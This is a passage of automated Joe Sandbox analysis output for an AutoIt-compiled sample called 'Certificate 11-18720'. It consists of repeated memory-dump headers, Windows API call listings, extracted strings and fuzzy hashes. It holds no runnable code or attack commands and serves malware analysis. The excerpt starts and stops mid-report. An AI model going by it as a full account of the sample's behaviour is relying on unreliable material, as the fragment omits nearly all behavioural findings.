                                                                                    • Source File: 00000000.00000002.1703940394.0000000000F43000.00000040.00000020.00020000.00000000.sdmp, Offset: 00F43000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_f43000_Certificate 11-18720.jbxd
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703940394.0000000000F43000.00000040.00000020.00020000.00000000.sdmp, Offset: 00F43000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_f43000_Certificate 11-18720.jbxd
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703940394.0000000000F43000.00000040.00000020.00020000.00000000.sdmp, Offset: 00F43000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_f43000_Certificate 11-18720.jbxd
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703940394.0000000000F43000.00000040.00000020.00020000.00000000.sdmp, Offset: 00F43000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_f43000_Certificate 11-18720.jbxd
                                                                                    APIs
                                                                                    • DeleteObject.GDI32(00000000), ref: 0061A2FE
                                                                                    • DeleteObject.GDI32(00000000), ref: 0061A310
                                                                                    • DestroyWindow.USER32 ref: 0061A31E
                                                                                    • GetDesktopWindow.USER32 ref: 0061A338
                                                                                    • GetWindowRect.USER32(00000000), ref: 0061A33F
                                                                                    • SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 0061A480
                                                                                    • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000002), ref: 0061A490
                                                                                    • CreateWindowExW.USER32(00000002,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0061A4D8
                                                                                    • GetClientRect.USER32(00000000,?), ref: 0061A4E4
                                                                                    • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 0061A51E
                                                                                    • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0061A540
                                                                                    • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0061A553
                                                                                    • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0061A55E
                                                                                    • GlobalLock.KERNEL32(00000000), ref: 0061A567
                                                                                    • ReadFile.KERNEL32(00000000,00000000,00000000,00000190,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0061A576
                                                                                    • GlobalUnlock.KERNEL32(00000000), ref: 0061A57F
                                                                                    • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0061A586
                                                                                    • GlobalFree.KERNEL32(00000000), ref: 0061A591
                                                                                    • CreateStreamOnHGlobal.OLE32(00000000,00000001,88C00000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0061A5A3
                                                                                    • OleLoadPicture.OLEAUT32(88C00000,00000000,00000000,0064D9BC,00000000), ref: 0061A5B9
                                                                                    • GlobalFree.KERNEL32(00000000), ref: 0061A5C9
                                                                                    • CopyImage.USER32(000001F4,00000000,00000000,00000000,00002000), ref: 0061A5EF
                                                                                    • SendMessageW.USER32(?,00000172,00000000,000001F4), ref: 0061A60E
                                                                                    • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0061A630
                                                                                    • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0061A81D
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
• Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                                                                    • String ID: $AutoIt v3$DISPLAY$static
                                                                                    • API String ID: 2211948467-2373415609
                                                                                    APIs
                                                                                    • SetTextColor.GDI32(?,00000000), ref: 0062D2DB
                                                                                    • GetSysColorBrush.USER32(0000000F), ref: 0062D30C
                                                                                    • GetSysColor.USER32(0000000F), ref: 0062D318
                                                                                    • SetBkColor.GDI32(?,000000FF), ref: 0062D332
                                                                                    • SelectObject.GDI32(?,00000000), ref: 0062D341
                                                                                    • InflateRect.USER32(?,000000FF,000000FF), ref: 0062D36C
                                                                                    • GetSysColor.USER32(00000010), ref: 0062D374
                                                                                    • CreateSolidBrush.GDI32(00000000), ref: 0062D37B
                                                                                    • FrameRect.USER32(?,?,00000000), ref: 0062D38A
                                                                                    • DeleteObject.GDI32(00000000), ref: 0062D391
                                                                                    • InflateRect.USER32(?,000000FE,000000FE), ref: 0062D3DC
                                                                                    • FillRect.USER32(?,?,00000000), ref: 0062D40E
                                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 0062D439
                                                                                      • Part of subcall function 0062D575: GetSysColor.USER32(00000012), ref: 0062D5AE
                                                                                      • Part of subcall function 0062D575: SetTextColor.GDI32(?,?), ref: 0062D5B2
                                                                                      • Part of subcall function 0062D575: GetSysColorBrush.USER32(0000000F), ref: 0062D5C8
                                                                                      • Part of subcall function 0062D575: GetSysColor.USER32(0000000F), ref: 0062D5D3
                                                                                      • Part of subcall function 0062D575: GetSysColor.USER32(00000011), ref: 0062D5F0
                                                                                      • Part of subcall function 0062D575: CreatePen.GDI32(00000000,00000001,00743C00), ref: 0062D5FE
                                                                                      • Part of subcall function 0062D575: SelectObject.GDI32(?,00000000), ref: 0062D60F
                                                                                      • Part of subcall function 0062D575: SetBkColor.GDI32(?,00000000), ref: 0062D618
                                                                                      • Part of subcall function 0062D575: SelectObject.GDI32(?,?), ref: 0062D625
                                                                                      • Part of subcall function 0062D575: InflateRect.USER32(?,000000FF,000000FF), ref: 0062D644
                                                                                      • Part of subcall function 0062D575: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0062D65B
                                                                                      • Part of subcall function 0062D575: GetWindowLongW.USER32(00000000,000000F0), ref: 0062D670
                                                                                      • Part of subcall function 0062D575: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0062D698
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
• Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameMessageRoundSendSolid
                                                                                    • String ID:
                                                                                    • API String ID: 3521893082-0
                                                                                    APIs
                                                                                    • DestroyWindow.USER32 ref: 005DB98B
                                                                                    • DeleteObject.GDI32(00000000), ref: 005DB9CD
                                                                                    • DeleteObject.GDI32(00000000), ref: 005DB9D8
                                                                                    • DestroyIcon.USER32(00000000), ref: 005DB9E3
                                                                                    • DestroyWindow.USER32(00000000), ref: 005DB9EE
                                                                                    • SendMessageW.USER32(?,00001308,?,00000000), ref: 0063D2AA
                                                                                    • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 0063D2E3
                                                                                    • MoveWindow.USER32(00000000,?,?,?,?,00000000), ref: 0063D711
                                                                                      • Part of subcall function 005DB9FF: InvalidateRect.USER32(?,00000000,00000001,?,?,?,005DB759,?,00000000,?,?,?,?,005DB72B,00000000,?), ref: 005DBA58
                                                                                    • SendMessageW.USER32 ref: 0063D758
                                                                                    • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 0063D76F
                                                                                    • ImageList_Destroy.COMCTL32(00000000), ref: 0063D785
                                                                                    • ImageList_Destroy.COMCTL32(00000000), ref: 0063D790
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
• Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: Destroy$ImageList_MessageSendWindow$DeleteObject$IconInvalidateMoveRectRemove
                                                                                    • String ID: 0
                                                                                    • API String ID: 464785882-4108050209
                                                                                    APIs
                                                                                    • SetErrorMode.KERNEL32(00000001), ref: 0060DBD6
                                                                                    • GetDriveTypeW.KERNEL32(?,0065DC54,?,\\.\,0065DC00), ref: 0060DCC3
                                                                                    • SetErrorMode.KERNEL32(00000000,0065DC54,?,\\.\,0065DC00), ref: 0060DE29
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
• Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: ErrorMode$DriveType
                                                                                    • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                                                    • API String ID: 2907320926-4222207086
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: __wcsnicmp
                                                                                    • String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                                                                    • API String ID: 1038674560-86951937
                                                                                    • Opcode ID: 63124537db9a9fafb011a2f1a6d88e45dee742c9d89dbd7efb2b30cf026faa5f
                                                                                    • Instruction ID: 58c012d9dc0b816488e0dc960c1fa9342660eb33e11aa7e7a27866b04f22a25b
                                                                                    • Opcode Fuzzy Hash: 63124537db9a9fafb011a2f1a6d88e45dee742c9d89dbd7efb2b30cf026faa5f
                                                                                    • Instruction Fuzzy Hash: E981E8306402576ECB25AAA4DC97FBB3F6AFF54700F04402DF94AAA2C2EA60D945C795
                                                                                    APIs
                                                                                    • CharUpperBuffW.USER32(?,?,0065DC00), ref: 00626449
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: BuffCharUpper
                                                                                    • String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
                                                                                    • API String ID: 3964851224-45149045
                                                                                    • Opcode ID: fb17d7f0a47805406ac54f1bf304d5c4e79247d2770494febab83baef9ec9ce6
                                                                                    • Instruction ID: 0ae5f031b0b9eb11e09ee161874027e39189ff91b6aa3bef67f65e1189f9ac20
                                                                                    • Opcode Fuzzy Hash: fb17d7f0a47805406ac54f1bf304d5c4e79247d2770494febab83baef9ec9ce6
                                                                                    • Instruction Fuzzy Hash: 75C17230204656CBCB14EF14D555AAE7BA7BFD4344F14885AF8865B3A2DB24ED0BCF82
                                                                                    APIs
                                                                                    • GetSysColor.USER32(00000012), ref: 0062D5AE
                                                                                    • SetTextColor.GDI32(?,?), ref: 0062D5B2
                                                                                    • GetSysColorBrush.USER32(0000000F), ref: 0062D5C8
                                                                                    • GetSysColor.USER32(0000000F), ref: 0062D5D3
                                                                                    • CreateSolidBrush.GDI32(?), ref: 0062D5D8
                                                                                    • GetSysColor.USER32(00000011), ref: 0062D5F0
                                                                                    • CreatePen.GDI32(00000000,00000001,00743C00), ref: 0062D5FE
                                                                                    • SelectObject.GDI32(?,00000000), ref: 0062D60F
                                                                                    • SetBkColor.GDI32(?,00000000), ref: 0062D618
                                                                                    • SelectObject.GDI32(?,?), ref: 0062D625
                                                                                    • InflateRect.USER32(?,000000FF,000000FF), ref: 0062D644
                                                                                    • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0062D65B
                                                                                    • GetWindowLongW.USER32(00000000,000000F0), ref: 0062D670
                                                                                    • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0062D698
                                                                                    • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 0062D6BF
                                                                                    • InflateRect.USER32(?,000000FD,000000FD), ref: 0062D6DD
                                                                                    • DrawFocusRect.USER32(?,?), ref: 0062D6E8
                                                                                    • GetSysColor.USER32(00000011), ref: 0062D6F6
                                                                                    • SetTextColor.GDI32(?,00000000), ref: 0062D6FE
                                                                                    • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 0062D712
                                                                                    • SelectObject.GDI32(?,0062D2A5), ref: 0062D729
                                                                                    • DeleteObject.GDI32(?), ref: 0062D734
                                                                                    • SelectObject.GDI32(?,?), ref: 0062D73A
                                                                                    • DeleteObject.GDI32(?), ref: 0062D73F
                                                                                    • SetTextColor.GDI32(?,?), ref: 0062D745
                                                                                    • SetBkColor.GDI32(?,?), ref: 0062D74F
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                                                    • String ID:
                                                                                    • API String ID: 1996641542-0
                                                                                    • Opcode ID: 3ad3b7444245680760449f72368bceb2db483a737e256eca9f97140414c378d4
                                                                                    • Instruction ID: 592b1820495f310a587fe998c9a9c6af3a6184cded3d04f9d8994adf8897de18
                                                                                    • Opcode Fuzzy Hash: 3ad3b7444245680760449f72368bceb2db483a737e256eca9f97140414c378d4
                                                                                    • Instruction Fuzzy Hash: BB514975D00218AFDB11AFA8DC48EEE7B7AFB0A324F205115FA15AB2A1D7719A40CF50
                                                                                    APIs
                                                                                    • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 0062B7B0
                                                                                    • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 0062B7C1
                                                                                    • CharNextW.USER32(0000014E), ref: 0062B7F0
                                                                                    • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 0062B831
                                                                                    • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 0062B847
                                                                                    • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 0062B858
                                                                                    • SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 0062B875
                                                                                    • SetWindowTextW.USER32(?,0000014E), ref: 0062B8C7
                                                                                    • SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 0062B8DD
                                                                                    • SendMessageW.USER32(?,00001002,00000000,?), ref: 0062B90E
                                                                                    • _memset.LIBCMT ref: 0062B933
                                                                                    • SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 0062B97C
                                                                                    • _memset.LIBCMT ref: 0062B9DB
                                                                                    • SendMessageW.USER32 ref: 0062BA05
                                                                                    • SendMessageW.USER32(?,00001074,?,00000001), ref: 0062BA5D
                                                                                    • SendMessageW.USER32(?,0000133D,?,?), ref: 0062BB0A
                                                                                    • InvalidateRect.USER32(?,00000000,00000001), ref: 0062BB2C
                                                                                    • GetMenuItemInfoW.USER32(?), ref: 0062BB76
                                                                                    • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 0062BBA3
                                                                                    • DrawMenuBar.USER32(?), ref: 0062BBB2
                                                                                    • SetWindowTextW.USER32(?,0000014E), ref: 0062BBDA
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
                                                                                    • String ID: 0
                                                                                    • API String ID: 1073566785-4108050209
                                                                                    • Opcode ID: cd459c96826dee10a3262f4714525580d6e29463762f3b70642eba662ca5a6cf
                                                                                    • Instruction ID: 984064abb6250ef6242c4c4e0de25890bfaeed2e9e12f732b5d5e854bd50ecfc
                                                                                    • Opcode Fuzzy Hash: cd459c96826dee10a3262f4714525580d6e29463762f3b70642eba662ca5a6cf
                                                                                    • Instruction Fuzzy Hash: 38E1E474900629AFDF20DF65DC84EEE7B7AFF05710F149156F919AA290DB708A82CF60
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: Window$Foreground
                                                                                    • String ID: ACTIVE$ALL$CLASS$H+g$HANDLE$INSTANCE$L+g$LAST$P+g$REGEXPCLASS$REGEXPTITLE$T+g$TITLE
                                                                                    • API String ID: 62970417-2671356491
                                                                                    • Opcode ID: c2810a10781a19a81b97d122304c13fef3db08622fb98d0a6fcbd58360ca9b00
                                                                                    • Instruction ID: 0657722e4ac00db470d55e408ee9122b8ac4d2817f161aefc4e61b8560d43d0b
                                                                                    • Opcode Fuzzy Hash: c2810a10781a19a81b97d122304c13fef3db08622fb98d0a6fcbd58360ca9b00
                                                                                    • Instruction Fuzzy Hash: F9D1C430508247DFCB14EF60C895AAABFB6BF94344F00491DF45A576A1DB30EA9ACBD1
                                                                                    APIs
                                                                                    • GetCursorPos.USER32(?), ref: 0062778A
                                                                                    • GetDesktopWindow.USER32 ref: 0062779F
                                                                                    • GetWindowRect.USER32(00000000), ref: 006277A6
                                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 00627808
                                                                                    • DestroyWindow.USER32(?), ref: 00627834
                                                                                    • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 0062785D
                                                                                    • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0062787B
                                                                                    • SendMessageW.USER32(?,00000439,00000000,00000030), ref: 006278A1
                                                                                    • SendMessageW.USER32(?,00000421,?,?), ref: 006278B6
                                                                                    • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 006278C9
                                                                                    • IsWindowVisible.USER32(?), ref: 006278E9
                                                                                    • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00627904
                                                                                    • SendMessageW.USER32(?,00000411,00000001,00000030), ref: 00627918
                                                                                    • GetWindowRect.USER32(?,?), ref: 00627930
                                                                                    • MonitorFromPoint.USER32(?,?,00000002), ref: 00627956
                                                                                    • GetMonitorInfoW.USER32 ref: 00627970
                                                                                    • CopyRect.USER32(?,?), ref: 00627987
                                                                                    • SendMessageW.USER32(?,00000412,00000000), ref: 006279F2
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                                                                    • String ID: ($0$tooltips_class32
                                                                                    • API String ID: 698492251-4156429822
                                                                                    • Opcode ID: 847134aeed5c9e267b39fc20389f0caa901a9033d8a8e00ec49737604135fdb4
                                                                                    • Instruction ID: 255b03a5cf47b03e3a8b1e5e94a80993577c04ef8623c3a215ed04c7445e1cd7
                                                                                    • Opcode Fuzzy Hash: 847134aeed5c9e267b39fc20389f0caa901a9033d8a8e00ec49737604135fdb4
                                                                                    • Instruction Fuzzy Hash: F6B18B71A08711AFDB04DF64D848F6ABBE6BF89310F00891DF5999B291DB70E805CF96
                                                                                    APIs
                                                                                    • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 005DA939
                                                                                    • GetSystemMetrics.USER32(00000007), ref: 005DA941
                                                                                    • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 005DA96C
                                                                                    • GetSystemMetrics.USER32(00000008), ref: 005DA974
                                                                                    • GetSystemMetrics.USER32(00000004), ref: 005DA999
                                                                                    • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 005DA9B6
                                                                                    • AdjustWindowRectEx.USER32(000000FF,00000000,00000000,00000000), ref: 005DA9C6
                                                                                    • CreateWindowExW.USER32(00000000,AutoIt v3 GUI,?,00000000,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 005DA9F9
                                                                                    • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 005DAA0D
                                                                                    • GetClientRect.USER32(00000000,000000FF), ref: 005DAA2B
                                                                                    • GetStockObject.GDI32(00000011), ref: 005DAA47
                                                                                    • SendMessageW.USER32(00000000,00000030,00000000), ref: 005DAA52
                                                                                      • Part of subcall function 005DB63C: GetCursorPos.USER32(000000FF), ref: 005DB64F
                                                                                      • Part of subcall function 005DB63C: ScreenToClient.USER32(00000000,000000FF), ref: 005DB66C
                                                                                      • Part of subcall function 005DB63C: GetAsyncKeyState.USER32(00000001), ref: 005DB691
                                                                                      • Part of subcall function 005DB63C: GetAsyncKeyState.USER32(00000002), ref: 005DB69F
                                                                                    • SetTimer.USER32(00000000,00000000,00000028,005DAB87), ref: 005DAA79
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                                                    • String ID: AutoIt v3 GUI
                                                                                    • API String ID: 1458621304-248962490
                                                                                    • Opcode ID: c17d15ebf8d883c857d4e47c843c6cad07b9b0bd6febd9606c9a3d4c151cd712
                                                                                    • Instruction ID: 19ecb14733d6cc7e5978d91c5aa80c8b4f8051a9e228e82e838bd115678e41f3
                                                                                    • Opcode Fuzzy Hash: c17d15ebf8d883c857d4e47c843c6cad07b9b0bd6febd9606c9a3d4c151cd712
                                                                                    • Instruction Fuzzy Hash: E3B18075A0020AAFDB24DFA8DC45BEE7BB6FB09314F11421AFA15AB390DB74D841CB51
APIs
• RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00623735
